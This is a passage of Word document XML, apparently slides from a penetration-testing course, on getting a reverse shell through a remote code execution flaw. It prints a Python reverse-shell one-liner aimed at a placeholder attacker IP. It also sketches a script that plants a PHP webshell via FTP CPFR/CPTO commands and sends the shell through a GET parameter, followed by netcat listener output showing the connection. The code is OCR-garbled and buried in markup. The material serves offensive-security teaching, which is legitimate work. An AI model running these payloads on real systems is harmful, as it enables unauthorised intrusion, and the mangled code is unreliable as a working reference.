        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Often t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="70"/>
        </w:rPr>
        <w:t>imes this is minified.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29760155" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="315" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="54"/>
        </w:rPr>
        <w:t>On cheatsheets you will see this compressed to just one long line.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F1DDD64" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="3278"/>
          <w:tab w:val="center" w:pos="14048"/>
        </w:tabs>
        <w:spacing w:after="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="46"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">python -c ' import os, socket; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="46"/>
        </w:rPr>
        <w:tab/>
        <w:t>("YOUR . HOST .IP.ADDRESS",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C3120E" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="234" w:line="264" w:lineRule="auto"/>
        <w:ind w:left="1470" w:right="2595" w:firstLine="795"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="50"/>
        </w:rPr>
        <w:t>.dup2(s.fi1eno(), 0);os.dup2(s.fi1eno(), 1);os.dup2(s.fi1eno(), . system( " /bin/sh") '</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01987CEE" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="268" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="54"/>
        </w:rPr>
        <w:t>This is so you can easily copy and paste it in your RCE vector!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51FD61C5" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="5" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="54"/>
        </w:rPr>
        <w:t>Remember, you'll need to set up a listener to catch the reverse shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="009C9BF6" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="300" w:right="-510"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="29FF0216" wp14:editId="36FFCD53">
            <wp:extent cx="11087100" cy="1552575"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="340836" name="Picture 34083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836" name="Picture 340836"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId185"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="11087100" cy="1552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17DFB2" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="4"/>
        <w:ind w:left="445" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="72"/>
        </w:rPr>
        <w:t>Execute this with the RCE attack vector:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15ED7367" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="164" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="54"/>
        </w:rPr>
        <w:t>This payload has a lot of special characters...</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblpPr w:vertAnchor="text" w:tblpX="285" w:tblpY="915"/>
        <w:tblOverlap w:val="never"/>
        <w:tblW w:w="16605" w:type="dxa"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="84" w:type="dxa"/>
          <w:left w:w="0" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="405" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="16605"/>
      </w:tblGrid>
      <w:tr w:rsidR="007A5F0C" w14:paraId="3B11A219" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="4935"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="16605" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5170FD30" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="27" w:line="365" w:lineRule="auto"/>
              <w:ind w:left="165" w:right="11175" w:hanging="15"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="42"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">#!/usr/bin/env python3 import </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="42"/>
              </w:rPr>
              <w:t>socket, requests</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76ADF68F" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="150"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="38"/>
              </w:rPr>
              <w:t># Create a socket object and connect to FTP service</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0AD8C57D" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="264" w:line="216" w:lineRule="auto"/>
              <w:ind w:left="150" w:right="2085"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="40"/>
              </w:rPr>
              <w:t># With the socket object, send CPFR and CPTO commands to create a PHP webshell . # Have the webshell read from a GET variable, and send along your reverse shell!</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="391CF180" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="0" w:line="216" w:lineRule="auto"/>
              <w:ind w:left="180"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="42"/>
              </w:rPr>
              <w:t>requests .get("http://192</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="42"/>
              </w:rPr>
              <w:t xml:space="preserve">.168.229.le5/rce.php?c=python -c 'import os, soc ket ; </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="42"/>
              </w:rPr>
              <w:tab/>
              <w:t xml:space="preserve">ket . socket( ) ,•s . connect( ( </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="42"/>
              </w:rPr>
              <w:tab/>
              <w:t xml:space="preserve">. ATTACKER . IP . ADDRESS \ " , </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="42"/>
              </w:rPr>
              <w:t>seei) ) ,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="42"/>
              </w:rPr>
              <w:t>•os .dup2(s. fileno(),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="266991F8" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="-210"/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0E74BFFF" wp14:editId="2FF6611F">
                      <wp:extent cx="10382250" cy="1019175"/>
                      <wp:effectExtent l="0" t="0" r="0" b="0"/>
                      <wp:docPr id="338456" name="Group 33845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0382250" cy="1019175"/>
                                <a:chOff x="0" y="0"/>
                                <a:chExt cx="10382250" cy="101917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40838" name="Picture 340838"/>
                                <pic:cNvPicPr/>
                              </pic:nvPicPr>
                              <pic:blipFill>
                                <a:blip r:embed="rId18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28575"/>
                                  <a:ext cx="10382250" cy="9906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251063" name="Rectangle 251063"/>
                              <wps:cNvSpPr/>
                              <wps:spPr>
                                <a:xfrm>
                                  <a:off x="371475" y="0"/>
                                  <a:ext cx="152019" cy="31670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5A054A04" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
                                    <w:r>
                                      <w:rPr>
                                        <w:sz w:val="56"/>
                                      </w:rPr>
                                      <w:t xml:space="preserve">)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251064" name="Rectangle 251064"/>
                              <wps:cNvSpPr/>
                              <wps:spPr>
                                <a:xfrm>
                                  <a:off x="485775" y="0"/>
                                  <a:ext cx="126683" cy="31670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D3FC89A" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
                                    <w:r>
                                      <w:rPr>
                                        <w:sz w:val="52"/>
                                      </w:rPr>
                                      <w:t xml:space="preserve">;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251069" name="Rectangle 251069"/>
                              <wps:cNvSpPr/>
                              <wps:spPr>
                                <a:xfrm>
                                  <a:off x="5943600" y="0"/>
                                  <a:ext cx="50673" cy="278702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40ABBB5" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
                                    <w:r>
                                      <w:rPr>
                                        <w:sz w:val="72"/>
                                      </w:rPr>
                                      <w:t>.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E74BFFF" id="Group 338456" o:spid="_x0000_s1064" style="width:817.5pt;height:80.25pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="103822,10191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FFFABRRRQAUUUUAfJNrGLeEJVzwLG6+MdF3KwH2yHr/wBdBVT5TWv4Sf8A4qzRB/0/Qf8Aoxas&#10;Vz6eoooqBh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">
                      <v:shape id="Picture 340838" o:spid="_x0000_s1065" type="#_x0000_t75" style="position:absolute;top:285;width:103822;height:99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">
                        <v:imagedata r:id="rId187" o:title=""/>
                      </v:shape>
                      <v:rect id="Rectangle 251063" o:spid="_x0000_s1066" style="position:absolute;left:3714;width:1520;height:31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" filled="f" stroked="f">
                        <v:textbox inset="0,0,0,0">
                          <w:txbxContent>
                            <w:p w14:paraId="5A054A04" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
                              <w:r>
                                <w:rPr>
                                  <w:sz w:val="56"/>
                                </w:rPr>
                                <w:t xml:space="preserve">) </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </v:textbox>
                      </v:rect>
                      <v:rect id="Rectangle 251064" o:spid="_x0000_s1067" style="position:absolute;left:4857;width:1267;height:31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" filled="f" stroked="f">
                        <v:textbox inset="0,0,0,0">
                          <w:txbxContent>
                            <w:p w14:paraId="3D3FC89A" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
                              <w:r>
                                <w:rPr>
                                  <w:sz w:val="52"/>
                                </w:rPr>
                                <w:t xml:space="preserve">; </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </v:textbox>
                      </v:rect>
                      <v:rect id="Rectangle 251069" o:spid="_x0000_s1068" style="position:absolute;left:59436;width:506;height:27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" filled="f" stroked="f">
                        <v:textbox inset="0,0,0,0">
                          <w:txbxContent>
                            <w:p w14:paraId="340ABBB5" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
                              <w:r>
                                <w:rPr>
                                  <w:sz w:val="72"/>
                                </w:rPr>
                                <w:t>.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</w:tr>
    </w:tbl>
    <w:p w14:paraId="2E846C1B" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="3" w:line="264" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251718656" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="0" wp14:anchorId="19F8A0AE" wp14:editId="7238F273">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>10658475</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1600200</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="619125" cy="2457450"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="340839" name="Picture 34083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839" name="Picture 340839"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId188"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="619125" cy="2457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0"/>
        </w:rPr>
        <w:t>It is best to send it through the HTTP GET variable passed to PHP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2934052D" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0DBA0B4F" wp14:editId="35508DF9">
            <wp:extent cx="10515600" cy="104775"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="251745" name="Picture 25174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1745" name="Picture 251745"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId189"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="10515600" cy="104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 w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB7601F" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="3"/>
        <w:ind w:left="400" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="74"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>You will see the server connect back!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54EF57C2" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="4" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>If you use the -v verbose flag on your listener, you will see the connection.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="16568" w:type="dxa"/>
        <w:tblInd w:w="323" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="70" w:type="dxa"/>
          <w:left w:w="128" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="30" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="16568"/>
      </w:tblGrid>
      <w:tr w:rsidR="007A5F0C" w14:paraId="3C0354FB" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="3611"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="165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</w:tcPr>
          <w:p w14:paraId="7D0686CA" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="center" w:pos="3818"/>
              </w:tabs>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="44"/>
              </w:rPr>
              <w:t>root@kali</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="44"/>
              </w:rPr>
              <w:tab/>
              <w:t>nc -Invp 9001</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E6DE100" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="30"/>
              <w:ind w:left="4185"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6E634CBD" wp14:editId="7283F335">
                  <wp:extent cx="2581275" cy="28575"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="257547" name="Picture 25754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7547" name="Picture 257547"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId19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81275" cy="28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85DB350" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="46"/>
              </w:rPr>
              <w:t xml:space="preserve">Ncat: Version </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B161E88" wp14:editId="2A9E1F00">
                  <wp:extent cx="114300" cy="38100"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="257324" name="Picture 25732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7324" name="Picture 257324"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId19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300" cy="38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46"/>
              </w:rPr>
              <w:t>7.70 ( https: //nmap.org/ncat )</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1DB4D6B6" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="46"/>
              <w:ind w:left="3510"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0F180371" wp14:editId="2748C19F">
                  <wp:extent cx="3200400" cy="9525"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="340841" name="Picture 34084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0841" name="Picture 340841"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId19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0400" cy="9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D9DC501" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="0"/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719680" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2D38B3C0" wp14:editId="73548F0F">
                      <wp:simplePos x="0" y="0"/>
                      <wp:positionH relativeFrom="column">
                        <wp:posOffset>2081213</wp:posOffset>
                      </wp:positionH>
                      <wp:positionV relativeFrom="paragraph">
                        <wp:posOffset>189859</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="657225" cy="57150"/>
                      <wp:effectExtent l="0" t="0" r="0" b="0"/>
                      <wp:wrapSquare wrapText="bothSides"/>
                      <wp:docPr id="341154" name="Group 34115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657225" cy="57150"/>
                                <a:chOff x="0" y="0"/>
                                <a:chExt cx="657225" cy="5715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257290" name="Picture 257290"/>
                                <pic:cNvPicPr/>
                              </pic:nvPicPr>
                              <pic:blipFill>
                                <a:blip r:embed="rId19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466725" y="0"/>
                                  <a:ext cx="190500" cy="381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257345" name="Picture 257345"/>
                                <pic:cNvPicPr/>
                              </pic:nvPicPr>
                              <pic:blipFill>
                                <a:blip r:embed="rId194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28600" cy="571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anchor>
                  </w:drawing>
                </mc:Choice>
                <mc:Fallback xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <w:pict>
                    <v:group id="Group 341154" style="width:51.75pt;height:4.5pt;position:absolute;mso-position-horizontal-relative:text;mso-position-horizontal:absolute;margin-left:163.875pt;mso-position-vertical-relative:text;margin-top:14.9495pt;" coordsize="6572,571">
                      <v:shape id="Picture 257290" style="position:absolute;width:1905;height:381;left:4667;top:0;" filled="f">
                        <v:imagedata r:id="rId195"/>
                      </v:shape>
                      <v:shape id="Picture 257345" style="position:absolute;width:2286;height:571;left:0;top:0;" filled="f">
                        <v:imagedata r:id="rId196"/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sz w:val="50"/>
              </w:rPr>
              <w:t xml:space="preserve">Ncat: Listening on </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="50"/>
              </w:rPr>
              <w:t>: : : 9001</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="689B9CBD" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="50"/>
              </w:rPr>
              <w:t>Ncat: Listening on e. e. e. e: 9001</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34D8F5A6" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="44"/>
              </w:rPr>
              <w:t>Ncat: connection from 192.168.229.10</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="44"/>
              </w:rPr>
              <w:t>5.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0254A5DE" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="45"/>
              <w:ind w:left="1155"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0E012924" wp14:editId="5D93F2C3">
                  <wp:extent cx="3867150" cy="76200"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="340845" name="Picture 34084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0845" name="Picture 340845"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId19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67150" cy="76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46BF0D9" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="44"/>
              </w:rPr>
              <w:t xml:space="preserve">Ncat: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0FD514E2" wp14:editId="7C8EE71B">
                  <wp:extent cx="9686925" cy="819150"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="340847" name="Picture 34084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0847" name="Picture 340847"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId19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686925" cy="819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44"/>
              </w:rPr>
              <w:t>connection from 192.168.229.105: 53080.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="66DFE8BB" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="3" w:line="264" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="50"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>There won't be a "visible" prompt, but you do have a shell!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F02A65" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="15540" w:right="-510"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1145022E" wp14:editId="1F714C7F">
            <wp:extent cx="1409700" cy="1066800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="257685" name="Picture 25768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7685" name="Picture 257685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409700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974413" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="3"/>
        <w:ind w:left="430" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="70"/>
        </w:rPr>
        <w:t>Now, commands can be entered in an interactive way.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="641B6F82" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="300" w:right="-510"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="589056F0" wp14:editId="346414DF">
            <wp:extent cx="11087100" cy="4819650"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="340849" name="Picture 34084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849" name="Picture 340849"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId199"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="11087100" cy="4819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91A991" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="112"/>
        <w:ind w:left="418" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="72"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Some drawbacks:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E22E342" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="192" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="54"/>
        </w:rPr>
        <w:t xml:space="preserve">Our reverse shell was set to run / bin/ sh </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="54"/>
        </w:rPr>
        <w:tab/>
        <w:t>why not use / bin/ bash?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B755509" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="3" w:line="264" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="50"/>
        </w:rPr>
        <w:t>This shell is not very "stable:"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F4C100F" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="4" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>Control characters (like AC to stop a program) could kill the connection.</w:t>
